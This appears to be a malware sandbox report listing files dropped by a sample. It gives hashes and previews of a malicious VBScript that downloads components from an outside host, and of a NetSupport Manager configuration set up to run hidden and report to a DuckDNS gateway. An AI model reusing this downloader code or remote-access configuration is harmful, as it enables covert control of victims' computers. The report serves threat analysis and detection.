                                                                                      Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..

                                                                                      C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2891
                                                                                      Entropy (8bit):4.051212311792211
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:ez+xD8KvBvtvUlvLvMIlubCKvBvtvUlvgvPxI1iKvBvtvUlvKvCwQY1J:e2rZFMlzXMtZFMlonq1hZFMlCqBYz
                                                                                      MD5:905AD4C0382EAE16DF4C0DEA8E4D2FCC
                                                                                      SHA1:6597192580595528A3A24CF94C4B44E44CFA6BE4
                                                                                      SHA-256:49F4E7CDD3716A8E33A6659DAA709606A4D74AE84525FA395EFD8687F7E9D2AE
                                                                                      SHA-512:CC5784D1DA871001A838D9EA2AC774CC727CB0D0F8CB76F05AE76FD35FD4BFF86BF3418B4ABF32F9477F25FBB7710A3FC961072CC95E1A4AFD83C7A19DCBAA09
                                                                                      Malicious:true
                                                                                      Preview:On Error Resume Next.. Dim xmlHttp, fileSystem, tempFolder, targetFile, binaryStream, nsmFile, clientFile.... ' init.. Set xmlHttp = CreateObject("MSXML2.XMLHTTP").. Set fileSystem = CreateObject("Scripting.FileSystemObject").. Set tempFolder = fileSystem.GetSpecialFolder(2) ' Folder %TEMP%.... ' dl NSM.lic.. nsmFile = tempFolder & "\NSM.lic".. xmlHttp.Open "GET", "https://okolinabeauty.com/choh/NSM.lic", False.. xmlHttp.Send.. If xmlHttp.Status = 200 Then.. Set binaryStream = CreateObject("ADODB.Stream").. binaryStream.Type = 1 ' bin.. binaryStream.Open.. binaryStream.Write xmlHttp.responseBody.. binaryStream.SaveToFile nsmFile, 2.. binaryStream.Close.. End If.... ' dl Client32.ini..

                                                                                      C:\Users\user\AppData\Local\Temp\Client32.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):837
                                                                                      Entropy (8bit):5.545169772353752
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                      MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                      SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                      SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                      SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                      Malicious:false
                                                                                      Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..

                                                                                      C:\Users\user\AppData\Local\Temp\DLL_{CBB68368-7767-4CFF-B3E5-211488346702}.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):7455
                                                                                      Entropy (8bit):5.3062167321343745
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:RYvnYKY7YuY8YAYzhY8Y3YpYsULTYdYfYpQYPNYKYZ3YYkYRY1Yn6U8bYWYFYLYQ:RabeTtREhzaeKLTYiXQNJHFCK4Sxgezh
                                                                                      MD5:AEDC5EDF565BCBF2C77BD2E6F102E70B
                                                                                      SHA1:B72C62DDE21AC778AE81C91E6168C917F78A1A24
                                                                                      SHA-256:905767B0E08398F63864DF6846AE787372F9969E02193CF6CCB85962EAD1FCDD
                                                                                      SHA-512:7DF069D8ED310923D4D6A64E4886E05B999A682C5764AD235C090A61E926FE2EEF8EBB5280736CA9690868C9851635C743C259FE581C7A31C2AAC2F5951D577B
                                                                                      Malicious:false
                                                                                      Preview:[DLL31]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"TutorDeskIcon",STRING..Arg2=in,[TUTORDESKICON],STRING..Arg3=out,[TUTORDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL30]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"TechConsoleDeskIcon",STRING..Arg2=in,[TECHCONSOLEDESKICON],STRING..Arg3=out,[TECHCONSOLEDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL29]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"ControlDeskIcon",STRING..Arg2=in,[CONTROLDESKICON],STRING..Arg3=out,[CONTROLDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL28]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStrin

                                                                                      C:\Users\user\AppData\Local\Temp\NSM.lic

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):253
                                                                                      Entropy (8bit):5.069358624511852
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                      MD5:D2C2217861F5535686409D80A0867F6F
                                                                                      SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                      SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                      SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                      Malicious:false
                                                                                      Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oglvszav.vxt.ps1

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tndnumfm.dm1.psm1

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\vrep.msi

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                      Category:dropped
                                                                                      Size (bytes):41645568
                                                                                      Entropy (8bit):7.965918169264881
                                                                                      Encrypted:false
                                                                                      SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                      MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                      SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                      SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                      SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Temp\vrep.msi, Author: Joe Security
                                                                                      Preview:......................>...................|...............8........6....................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-.........../.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;................................................................... ..............................................."...!...*...#...$...%...&...'...(...).......+...4...-......./...0...1...2...3...6...5...C...7...J...M...:...<.......=...>...?.......A...B....=..E.......F...G...H...I...Z...Q...L...N.......O...P.......f...S...T...U...V...W...X...Y...K...[...\...]...^..._...`...a...b...c...d...e...h...g...t...i...j...k...l...m...n...o...p...q...r...s...v...u.......w...x...y...z...

                                                                                      C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\Client32.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):837
                                                                                      Entropy (8bit):5.545169772353752
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                      MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                      SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                      SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                      SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                      Malicious:false
                                                                                      Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..

                                                                                      C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\Client32.upd

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.243856189774724
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:tekKKv0ov:JR8y
                                                                                      MD5:C05C19B006D57DD4C90785CBE5C7877B
                                                                                      SHA1:34BEEBB832E53E4A3B9B3349919689FDF1401151
                                                                                      SHA-256:00E0C629D5645C15DF66ADCF99E8A0A3E517D7A7876141AE7A752F0585EEC047
                                                                                      SHA-512:BEDE1E24476A12E9B1F29962254B19B357BFDFBE5C6EEC9A2FCA6C1B2105F4CEC1D5872F6BE269EF39D6E5CC542DC587EA9555EF87687BAC64B3FF0DE16C0F8C
                                                                                      Malicious:false
                                                                                      Preview:[Client]..RoomSpec=Eval..

                                                                                      C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\NS.inf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):928
                                                                                      Entropy (8bit):3.5084050573465384
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q+eS1kWlWlp+an4gb0mfkPz4lmfkPVvmfkPVWmfs8xU37+NylWl8ajEiRFGjowA:Q+eS3WTr4gtc79cAc9U8E+AW1EMAFA
                                                                                      MD5:0973EE7629C5602C2CAF0146AC93058C
                                                                                      SHA1:2586483C867FC413132E6874C59A75B027E90FBF
                                                                                      SHA-256:2DA5A8A9B0708F1AEBF60379A04E46BF33C5B06DD64916C4EB4F321E34C7E631
                                                                                      SHA-512:D92DF68440D735836135F08F256783452ABDE2DC66163C693C2AEA144A7D7463C0F765E4AA684E07315799FB62E194B076F631BAF8229ECEC13E88A366638D7A
                                                                                      Malicious:false
                                                                                      Preview:..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.S.y.s.t.e.m. .A.c.c.e.s.s.].....L.S.A.A.n.o.n.y.m.o.u.s.N.a.m.e.L.o.o.k.u.p. .=. .1.....[.R.e.g.i.s.t.r.y. .V.a.l.u.e.s.].....M.A.C.H.I.N.E.\.S.y.s.t.e.m.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.C.o.n.t.r.o.l.\.L.s.a.\.E.v.e.r.y.o.n.e.I.n.c.l.u.d.e.s.A.n.o.n.y.m.o.u.s.=.4.,.1.....M.A.C.H.I.N.E.\.S.y.s.t.e.m.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.C.o.n.t.r.o.l.\.L.s.a.\.R.e.s.t.r.i.c.t.A.n.o.n.y.m.o.u.s.=.4.,.0.....M.A.C.H.I.N.E.\.S.y.s.t.e.m.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.C.o.n.t.r.o.l.\.L.s.a.\.R.e.s.t.r.i.c.t.A.n.o.n.y.m.o.u.s.S.A.M.=.4.,.0.....M.A.C.H.I.N.E.\.S.y.s.t.e.m.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.S.e.r.v.i.c.e.s.\.L.a.n.M.a.n.S.e.r.v.e.r.\.P.a.r.a.m.e.t.e.r.s.\.R.e.s.t.r.i.c.t.N.u.l.l.S.e.s.s.A.c.c.e.s.s.=.4.,.0.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....

                                                                                      C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\NSM.LIC

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):253
                                                                                      Entropy (8bit):5.069358624511852
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                      MD5:D2C2217861F5535686409D80A0867F6F
                                                                                      SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                      SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                      SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                      Malicious:false
                                                                                      Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..

                                                                                      C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\product.dat

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):506
                                                                                      Entropy (8bit):4.906453708261214
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:NUQi44RRN4CZCgivf2Ik2IgC0cxP/6Xrov:iJ4y4CZC/f2/2B2H6O
                                                                                      MD5:FF7C0D2DBB9195083BBABAFF482D5ED6
                                                                                      SHA1:5C2EFBF855C376CE1B93E681C54A367A407495DC
                                                                                      SHA-256:065D817596D710D5A06060241ACC207B82B844530CC56FF842FF53D8FF92A075
                                                                                      SHA-512:EA226B3A55FC59175136F104DF497EBF5055624FB1C1C8073B249DFC5E1ED5818A6FEEE995AA82CF9ED050F1ADC7A62994C90B1AF03569DFE0D4551EE2BC70C9
                                                                                      Malicious:false
                                                                                      Preview:5..0x61f7dbcb..LongName=NetSupport Manager..ShortName=NSM..Home=NSM..TLA=NSM..NSSName=NetSupport School..NSSTLA=NSS..SupportWWW=www.pci.co.uk/support|http://www.pci.co.uk/support..SupportEMail=support@pci.co.uk|mailto:support@pci.co.uk..NSMAppDataDir=NetSupport\NetSupport Manager..NSSAppDataDir=NetSupport\NetSupport School..NSSConfName=NetSupport School..AssistantName=Tutor Assistant..AssistantURL=http://www.netsupportschool.com/tutor-assistant.asp..TechConsole=1..SupportsChrome=1..SupportsAndroid=1..

                                                                                      C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\readnsm.chm

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                      Category:dropped
                                                                                      Size (bytes):157303
                                                                                      Entropy (8bit):7.89872596637976
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:duYWawdwZ7n0IjSTIvtFgSHcvCq1vdJojjXwDWaSRKjG88gs9A6BmgOUy:dI6Z7NvXcDJPo2WaMuXts9mUy
                                                                                      MD5:A9B2B2B4D72B44C182FF8403C97078BD
                                                                                      SHA1:808BE17D64883BF0B550B4B2E621D206736421D0
                                                                                      SHA-256:B86947F654351E605ACF0E3D09A00B4A20648CA60168476D1FBE6C4D9EEFE300
                                                                                      SHA-512:9459F723ACE5CFBEA23FC66738954A2383C730517486E3DE1F5CE70F48CDF039204683CA19E60FEA76616500CC7C82242051ABC04CC0F8D66BCDC46069AB9CBC
                                                                                      Malicious:false
                                                                                      Preview:ITSF....`..................|.{.......".....|.{......."..`...............x.......T.......................wf..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...M.../#ITBITS..../#IVB...-../#STRINGS...q.l./#SYSTEM....G./#TOPICS...M.`./#URLSTR...5.<./#URLTBL...-.../#WINDOWS...a.L./$FIftiMain...|..Q./$OBJINST...=.?./$WWAssociativeLinks/..../$WWAssociativeLinks/BTree...C.L./$WWAssociativeLinks/Data......./$WWAssociativeLinks/Map....../$WWAssociativeLinks/Property.... ./$WWKeywordLinks/..../$WWKeywordLinks/BTree...I.L./$WWKeywordLinks/Data......./$WWKeywordLinks/Map....../$WWKeywordLinks/Property...# !/conventions_and_terminology.html....../default.css.....O$/existing_installation_detected.html.....b./helpman_settings.js...~.[./helpman_topicinit.js......@./hm_btn_navigate_next.png...Y.../hm_btn_navigate_next_d.png...X.m /hm_btn_navigate_next_orange.png...E.m./hm_btn_navigate_prev.png...2.../hm_btn_navigate_prev_

                                                                                      C:\Users\user\AppData\Local\Temp\~F704.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):642
                                                                                      Entropy (8bit):3.6462235351457646
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q+4aVzvlXZMe5C6izCKaOPQ40bdpYm2o2nLCSm2TlCEtIlLlDtIloszlu:Q+LvjFihPQldjLG2Smi4EsDFyQ
                                                                                      MD5:9ADACE2EE6491BB7727E33B26D08EE21
                                                                                      SHA1:74F56456E8190F259D689D4FE9EC396989534010
                                                                                      SHA-256:440EA24D4A48DE2737817492926A97457151DC3BEB71BA66207AC33CBBC8F7D3
                                                                                      SHA-512:CD5FA2E207ED2A29A1E18F05374276D5528B5270B68E94F45F9819605192A4081B2394CAA6EF07B1B5D407EA0BBE153E825213F13C1CBB75681158A3827F48AD
                                                                                      Malicious:false
                                                                                      Preview:..[.G.e.n.e.r.a.l.I.n.f.o.].....P.a.t.h.T.o.I.S.B.E.W.6.4.E.x.e.=.........[.K.e.y.L.i.s.t.].....F.i.l.e.K.e.y.1.=.i.c.o.v.i.e.w.e.r...d.l.l.....C.o.u.n.t.=.1.........[.i.c.o.v.i.e.w.e.r...d.l.l.].....F.i.l.e.K.e.y.=.i.c.o.v.i.e.w.e.r...d.l.l.....F.u.l.l.P.a.t.h.=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.\.I.c.o.V.i.e.w.e.r...d.l.l.....C.o.m.p.o.n.e.n.t.=.I.c.o.V.i.e.w.e.r...d.l.l.....R.e.g.C.m.d.L.i.n.e.=.....U.n.R.e.g.C.m.d.L.i.n.e.=.....A.c.t.i.o.n.S.t.a.t.e.=.2.....6.4.B.i.t.=.N.o.....C.o.s.t.=.1.....O.r.d.e.r.=.3.2.6.0.0.....F.a.i.l.e.d.=.N.o.....H.R.E.S.U.L.T.=.0.....

                                                                                      C:\Users\user\Desktop\Pyyidau.vbs.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\cmd.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):433152
                                                                                      Entropy (8bit):5.502549953174867
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
                                                                                      MD5:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      SHA1:F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
                                                                                      SHA-256:73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
                                                                                      SHA-512:6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSI1387.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):763872
                                                                                      Entropy (8bit):6.574853256300612
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                      MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                      SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                      SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                      SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI1387.tmp, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)..H.H.H.3.l..H..>j..H.0w..H.0g..H.H..>I..>^..H..>_..H..>o..H..>n..H..>i..H.Rich.H.................PE..L.....oe.................t........................@..........................0............@..........................c.......@..,....P..(Y...........J...]......Lo.. ...................................@...............\....=..@....................text....s.......t.................. ..`.rdata..t............x..............@..@.data...@....p...0...N..............@....rsrc...(Y...P...Z...~..............@..@.reloc...p.......r..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Windows\Installer\MSI1DBA.tmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):250616
                                                                                      Entropy (8bit):6.25532114530443
                                                                                      Encrypted:false
